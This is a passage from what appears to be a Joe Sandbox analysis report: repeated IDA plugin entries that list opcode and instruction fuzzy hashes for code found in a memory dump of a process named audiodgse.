                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c4dc639e602e7673a079cf32c85cd8dcafb052dfcfb179d8a0dbb0b31acbf471
                                                                                • Instruction ID: 52b5c0df9e8cb0d894f35314edd171d91a1f4ae8d751df99e5e569dce5edc0df
                                                                                • Opcode Fuzzy Hash: c4dc639e602e7673a079cf32c85cd8dcafb052dfcfb179d8a0dbb0b31acbf471
                                                                                • Instruction Fuzzy Hash: 2BF024B23343429BFB9496199C82F32329EE7C0791F25C02AEF058B2C1F970DC118394
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 309fdbd3e365d8d875b1095ac7015b20caa6e001ebe49c6d6cac274c18a04e14
                                                                                • Instruction ID: a8aef09547b92c496d4157697dd02e9b8206373f32f12e9524e70ffd4959508a
                                                                                • Opcode Fuzzy Hash: 309fdbd3e365d8d875b1095ac7015b20caa6e001ebe49c6d6cac274c18a04e14
                                                                                • Instruction Fuzzy Hash: BE0144716207C29BEB32AB6CDD49B2637E8BB40B44F580594BB418BAD6DB78E4018615
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                • Instruction ID: b761c5638cc76ad2f97f807760b4b1bb281d729c11c1b3321854e1d79e86c115
                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                • Instruction Fuzzy Hash: 4DF0E93534191347EB37AA2D9430B3BE7D69F90904B05656C9741CB6C0DF60D9208780
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                • Instruction ID: 5024f65a34d4e1b5a925ed0e096906d6540643ba11d388b7d31c0a009961de52
                                                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                • Instruction Fuzzy Hash: C4F05E327316129BE721DA5ECC84F16B7E8AFD5A60F9A0169A7089B274C760EC0187D0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 91f9b4a9316f8e4c2e8930b4b423b783dd6451ffead1d94ab6923d634073bb1a
                                                                                • Instruction ID: 3a6fb098a79536b1e05c092959236b22a1e7532f12ceb1114b99476db939645a
                                                                                • Opcode Fuzzy Hash: 91f9b4a9316f8e4c2e8930b4b423b783dd6451ffead1d94ab6923d634073bb1a
                                                                                • Instruction Fuzzy Hash: 88F0C2706257449FC310EF68C946A2FF7E4FF98710F80465AB898DB394E634EA00CB96
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                • Instruction ID: 7b599f86ddb68d20c550a774d1a62e08f45c1651f4017563a217dfb8c5b23a7f
                                                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                • Instruction Fuzzy Hash: DEF0B472620205AFEB14DB26CC01F56B6EDFF98740F148478AA45DB260FAB0DD41C658
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ca0703eacf02a1fe892effb464aabdafb9dc1d822656be3c534ffb62dc3579b5
                                                                                • Instruction ID: be4923b8c51c1d7d8e7daba0f95e8921ec7e3a8af117bfcc1c25e07c017f2dea
                                                                                • Opcode Fuzzy Hash: ca0703eacf02a1fe892effb464aabdafb9dc1d822656be3c534ffb62dc3579b5
                                                                                • Instruction Fuzzy Hash: 0DF06270A11249EFCB04EFA9C515A6EB7F4FF18300F408055B955EB385DA74EA01CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d96409ad486e2d13ac8e70a79e07fb3802843edb310e30e170841977b443097c
                                                                                • Instruction ID: caf2687d59c90e5b441ea5b498fbf454ea1cac112574a9a8016d6e111eb0b28c
                                                                                • Opcode Fuzzy Hash: d96409ad486e2d13ac8e70a79e07fb3802843edb310e30e170841977b443097c
                                                                                • Instruction Fuzzy Hash: 39F0B4319366D2DFE733EB9CC844B61BBDC9F00628F08496AD6C9875D2CB64D8C0C651
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: abc4418440a34d8248c20ff306322e0f9ab6f5502b48c4877df7a38cc1ed937d
                                                                                • Instruction ID: 67746c5365769dc3831f19280985d37f9ce135d1128411d4c8aea83f6821206e
                                                                                • Opcode Fuzzy Hash: abc4418440a34d8248c20ff306322e0f9ab6f5502b48c4877df7a38cc1ed937d
                                                                                • Instruction Fuzzy Hash: FBF05CBF4157D106CF3A7B3C74523D12F7CA741A1CF691485E8A157209C674A48BC360
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 570c99766b5e2fcc80ffbf8a301257e0abdedf7dfc1935b2a6ee6d08f68d1e71
                                                                                • Instruction ID: 5b57b5e1dd1ecf450cb21c91d92af72fe00996c2caab48761b4ce5b2aeb3d2ac
                                                                                • Opcode Fuzzy Hash: 570c99766b5e2fcc80ffbf8a301257e0abdedf7dfc1935b2a6ee6d08f68d1e71
                                                                                • Instruction Fuzzy Hash: 84F027719316529FEF32D75CC148B617BD49BC07A4F089425D616C7652C370F8A0CBD1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                • Instruction ID: e6177f6ba8e6afac9c93a546f9b5df4237daf3e33babc0aa2e7601bdbd187c9f
                                                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                • Instruction Fuzzy Hash: 2EE0D8323516016BE7119E598CC0F67B76EDFD2B10F440479B7045F251C9E2DC0982A4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                • Instruction ID: 776910b8d708fbb95f20e904866906fdf6324e9042f2107372f3ec248e67b4ea
                                                                                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                • Instruction Fuzzy Hash: B1F0F8721242049FE3218B09D944B52B7A8EB05364F55842DE7099B561D27AAC40CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                • Instruction ID: 0b8c1909cb16e962d6e918f3f15cd94228ea252f9b68db2553fb85770d0765a3
                                                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                • Instruction Fuzzy Hash: 88F0E5392643419BDB1EDF19D040AE57BA8FB51360F010094F9428B341E775E9C1DB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                • Instruction ID: c7b04bdd03a41e7f92af73ac60c06f83efdaa4cba4874d8c06b4409fe2c01123
                                                                                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                • Instruction Fuzzy Hash: F5E0D8322741C6ABDB213A5D8921F6677A5DBDA7A0F150429E3009B150DBB8EC42C7D8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e288ee0dda847421aa2d08b4d01c03bbcb6f87f637242e135f0c0f829b7bcae5
                                                                                • Instruction ID: 64a1a6ace4be0eb04a9310a28a353ad51c0b14aa7a019e70e009e5197c3e87b5
                                                                                • Opcode Fuzzy Hash: e288ee0dda847421aa2d08b4d01c03bbcb6f87f637242e135f0c0f829b7bcae5
                                                                                • Instruction Fuzzy Hash: F6F09B31E35D914FE772D76CD544F5677E4EF90638F1A0594D40687962C724DC80C694
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                • Instruction ID: c5509e1641d4fe23989ef90c6f1191ed7b854c9e4e9ea02309a354ef576c8302
                                                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                • Instruction Fuzzy Hash: 4FE0DF72A00110BBDB22A7998E12FABBEECDB90EA4F050058B600E70D4E530DE00C690
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                • Instruction ID: add18fbb2b9d06d41b3d8c20edb8ffc4761faa1ba12a7483bffa669c7a0b2403
                                                                                • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                • Instruction Fuzzy Hash: 4EE09B316403548BCB298E1DD140A53BFE8EFD5668F158169E9054B612C231F852C6D4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: db7e0233319e69a4626aac1bb59c4815a9709754c924fbb06d8da822a5ee5e40
                                                                                • Instruction ID: 1bb9347fa3628d06a11f4f8f4cd639ccdfb738457bbc2fd9e389b93529612bfa
                                                                                • Opcode Fuzzy Hash: db7e0233319e69a4626aac1bb59c4815a9709754c924fbb06d8da822a5ee5e40
                                                                                • Instruction Fuzzy Hash: 3EE092721106949BC321FB29DD41FAB779EEB60764F014619F155571D0CA30AC50C798
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                • Instruction ID: 5f7ce7018da379dcce8eb355fd2d91429ec731081641a9d6d18d5b7a1c3615ca
                                                                                • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                • Instruction Fuzzy Hash: A2E0D831061651DFE7366F2AD848B62BBE0FF50716F148C2CE19A225F0CB7498D0CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                • Instruction ID: 9d9946eaf3c37300e211ce19edd4029a5b8a9c1b34b762df227d0eb2f992cfed
                                                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                • Instruction Fuzzy Hash: 4DE0AE343102468BE719DF19C044B627BA6BFD5A10F68C078AA488F205EB32A8428A50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1bde948adb682ec995412341216c8a0c862fbaf7252779689c8c869ae6db36d9
                                                                                • Instruction ID: 80520cda52c912eae76d5f352674f0134008d1b0c5b9f174284d38122756dabe
                                                                                • Opcode Fuzzy Hash: 1bde948adb682ec995412341216c8a0c862fbaf7252779689c8c869ae6db36d9
                                                                                • Instruction Fuzzy Hash: 94D02B324B10A16BCF35F91C7C04FA73A5DAB50770F014C60F20892050D568CC9193C4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                • Instruction ID: d13e1f15b8fb0c31648b6f35621235224796340708dbad56b6d7eb875feb9ea2
                                                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                • Instruction Fuzzy Hash: 5DE0C231134A51EFDB322F27DC40F627AA5FF54B90F104C29E582468B487F0AC81DB45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7e953b8837f8586da9bd08d8ee4cfb0ea10a78db1658e9f7db327c5ccf8d1a37
                                                                                • Instruction ID: 0fb44301db5c2390cd323bd9aa4da0eb6060bc720c262faabd5b8fbd2659d5e3
                                                                                • Opcode Fuzzy Hash: 7e953b8837f8586da9bd08d8ee4cfb0ea10a78db1658e9f7db327c5ccf8d1a37
                                                                                • Instruction Fuzzy Hash: 4BE0C232111590ABC311FB6DDD41F6A739EEFA4770F000225F151872D0CA30EC40C798
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                • Instruction ID: ed7a14455050a03e41646715a44ac9064e20cf6a0cf2027e7136eb7220a48512
                                                                                • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                • Instruction Fuzzy Hash: C5D05E36521A50AFD7329F1BEE40C53BBF9FBC4B50705062EE64583920C670A806DBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                • Instruction ID: 8fe7d4772a5987566a218ae0036e28896b8901e66c183108190e18581e780f56
                                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                • Instruction Fuzzy Hash: 02D0A932224620ABEB32AA2CFC04FD333E8BB98720F060459F008C7050C360AC81CA88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                • Instruction ID: 9cb2d460dadf9f205e17c0cd04c9ef750e2dbede76fbe6e7eac363eeaf1a9e2c
                                                                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                • Instruction Fuzzy Hash: 8EE0EC359616859FDF12DF69C640F9ABBB9BB94B40F560058A1485F660C634AD00CB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                • Instruction ID: f0ac4d83db07a1cac3770ce54d1756a80d6bf3d31c971ede790db6c9fb43a000
                                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                • Instruction Fuzzy Hash: 4AD0223223203193DB2896656841F737905AB80A90F0A012C790AA3800C0248C43D2E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                • Instruction ID: 78effa315da07cb47d9715d67044bbbd1800a2be8819ad3906f0e2068843b4f1
                                                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                • Instruction Fuzzy Hash: EBD012371E054DBBDB11DF66DC01FA57BA9E764BA0F444020F504875A0C63AE950D684
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bdbe2e05b9dea839e2af7e036d98a96f9667365a624cbd51d28302461ed12461
                                                                                • Instruction ID: 2664b92df2be4d50b63d4f24f0aadf4e0233d6dd0b1dd0beb4f4990dca9bb9e9
                                                                                • Opcode Fuzzy Hash: bdbe2e05b9dea839e2af7e036d98a96f9667365a624cbd51d28302461ed12461
                                                                                • Instruction Fuzzy Hash: F6D0C934675502DBEF2ADF5DCA51E7E7AB4FF14A41F80006CE701A2520E329DC11DB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                • Instruction ID: c165cf9e823effd4aae84b670f68ae6a22bcb79854a80ab757a8b613ddcffd64
                                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                • Instruction Fuzzy Hash: 63D0C936626E81CFD61BCB1DC5A4B1633A4BB45F44F810490F601CBB22E67CD944CA04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                • Instruction ID: 857e871de59f69a8c3010b7abc969203c4e61f9a4035c19e94097ba84146132b
                                                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                • Instruction Fuzzy Hash: F6C01232150644AFD711DA95CD01F1277A9E798B40F000021F20447570C531E810E644
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                • Instruction ID: 4c0cfbfdea55cbda9b2ecbebc07bab610db4cf72994f7b56aeb66f3d70831ff4
                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                • Instruction Fuzzy Hash: A3D01236110248EFCB02EF41D890DAA772AFBD8710F148019FD19076508A31ED62DA50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
